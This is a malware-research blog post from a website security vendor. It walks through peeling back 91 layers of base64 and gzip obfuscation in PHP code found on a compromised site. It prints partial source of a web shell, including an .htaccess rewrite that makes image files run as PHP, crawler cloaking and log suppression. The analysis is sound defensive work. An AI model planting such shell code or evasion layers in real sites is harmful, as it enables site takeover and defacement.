Sucuri Blog

Website Security News

Down the Malware Rabbit Hole – Part 1

It’s common for malware to be encoded to hide itself—or its true intentions—but have you ever given thought to what lengths attackers will go to hide their malicious code?

In our first post in this series, we’ll describe how bad actors hide their malicious code and the steps taken to reveal its true form.

Malware Obfuscation in Simple Terms

To begin, you’ll first need to understand a few simple concepts about malware and obfuscation.

  • To hide or obfuscate malware, the the payload is usually encoded. An example of this is seen when using base64 to represent binary data in an ASCII string format).
  • To execute malware, a separate unencoded text tells the programming engine to “read and execute” the malicious code. An example of this is the eval function
  • To decode malware, the execute and/or eval part can simply be removed and instead run like ”read me and print me” to reveal its true form.

The easiest way to achieve this is to replace the code instructions that tell PHP to execute the code with ones that tell it to print. Sounds simple, right?

To elaborate a bit, let’s imagine that the malware is performing an eval function to execute arbitrary PHP code.

eval(malicious code); – The eval function is responsible for executing the malware.

To deobfuscate the snippet, we can replace the eval function with an echo function in the PHP.

echo(malicious code);The echo function prints the arbitrary code instead of executing it.

Of course, this is an oversimplification of the process… But you get the idea, right?

Malware Deobfuscation: Principles In Action

Now that you know the basics, let’s examine this code that was recently found on a compromised website.

<?php
/*
Thanks For Using
V1
*/
$thanks = "PD9waHAKL[.....truncated.....]DsKPz4=";
eval('?>'.base64_decode($thanks));?>

We can pretty much employ the principles we just discussed to get it to show itself, but the output would result in this:

?><?php
/*
Blackscorpion Obfuscator
From : http://127.0.0.1/myenc.php*/
$error = "error_reporting";
$error(0);
$system = "JGJsY[.....truncated.....]BLCiI7";
$Black_Scorpion= "==waGU3[.....truncated.....]lNgmAwfVDoKA830AyCA";
eval(base64_decode($system));
assert(htmlspecialchars_decode(urldecode(base64_decode($blackie))));
exit ;
?>

You might be thinking, “Okay, we just have to go deeper, right?” Well, on the next step you’d find an even bigger hole:

$blackie = "ZXZhbCUyOCUyNyU[.....truncated.....]SUzQiUwRCUwQQ0K
";
return eval('?>'.gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(gzinflate(base64_decode(strrev(strrev(strrev(strrev(strrev(strrev(strrev($Black_Scorpion))))))))))))))))))))))))))))))))))))))));

Caveat: It’s important to note that in some of these steps, part of the code depends on former variables like $Black_Scorpion, which is seen in the output in the second code block. 

So, let’s keep digging…

?><?php
/*
Blackscorpion Obfuscator
From : http://127.0.0.1/myenc.php*/

$error = "error_reporting";
$error(0);
$system1 = "JH[.....truncated.....]QkxDaUk3IjsK";
$Black_Scorpion= "=gog5FCWwVl[.....truncated.....]YMA8HzAODA"; assert(base64_decode($system1)); assert(base64_decode($system)); $assert = "=oOGfMJANAGQ[.....truncated.....]t4kLssEn49PwA8TA";@assert(gzuncompress(gzinflate(base64_decode(strrev($assert)))));
exit;

You might look at this and think: “What? Isn’t this the same code as we saw before on one of the previous steps?”

It may look like it, but there are some subtle differences—specifically on the large base64 strings.

Malicious Nature Revealed

I could continue to show you how it goes deeper and deeper, but I would need to repeat this  process a total of 91 more times until the code finally reveals itself.

<?php

/*
____  _       _                             _
| __ )| | __ _  ___| | _____ ___ ___  _ __ _ __ (_) ___ _ __
|  _ \| |/ _` |/ __| |/ / __|/ __/ _ \| '__| '_ \| |/ _ \| '_ \
| |_) | | (_| | (__|   <\__ \ (_| (_) | | | |_) | | (_) | | | |
|____/|_|\__,_|\___|_|\_\___/\___\___/|_|  | .__/|_|\___/|_| |_|
|_|

Shell coded by Blackscorpion
Contact:andrewchris1337[at]gmail[.]com
*/

@mkdir('BlackscorpionShell');
$safe_mode = "QWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAuanBnCg==";
$mode = fopen(".htaccess","w+");
$write = fwrite ($mode ,base64_decode($safe_mode));
$auth_pass= "02cce9e28a5e94d01b691b733cd5106c"; //ultran00b
$color = "#7effc5";           // For Changing Font Colors
$default_charset = 'Windows-1251'; // For Changing Character Set Available Are

//    UTF-8
//    Windows-1251
//    KOI8-R
//    KOI8-U
//    cp866
// First Encode Your Deface Page to Base64
$defacepage ='PGh0bgegFfq4fwe5wefW[....truncated.....]WdrgfqwdqqwfFdfwefgw+';

$default_action = 'FilesMan';
$default_use_ajax = true;
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@define('Blackscorpion Shell');
symlinkk();
if(get_magic_quotes_gpc()) {
function Blackscorpionstripslashes($array) {
return is_array($array) ? array_map('Blackscorpionstripslashes', $array) : stripslashes($array);
}
$_POST = Blackscorpionstripslashes($_POST);
$_COOKIE = Blackscorpionstripslashes($_COOKIE);
}

function Blackscorpion() {
die ('<!DOCTYPE html>
<html>
<head>
<title>BlackScorpion Shell</title>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="">
<meta name="description" content="Sites description">

[....remaining code removed for reading purposes...]

We could decode a few more strings, but they are just base64-encoded and are simple enough to solve.

Analyzing 91 Layers of Hidden Malware

Now that we have the bulk of what we need to deobfuscate the malware, we can take a moment to analyze why a malicious actor would go to such extreme lengths to hide their code 91 layers deep in the first place. Many possible reasons exist, but most commonly these layers of obfuscation are employed to hide the malware from detection— especially when it’s easy to decode a simple method like this using free online tools.

Stay tuned for more on this topic. In part two, we’ll take a look at the tool used to hide the code and learn a bit more about how attackers encode their malware.

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Reader Interactions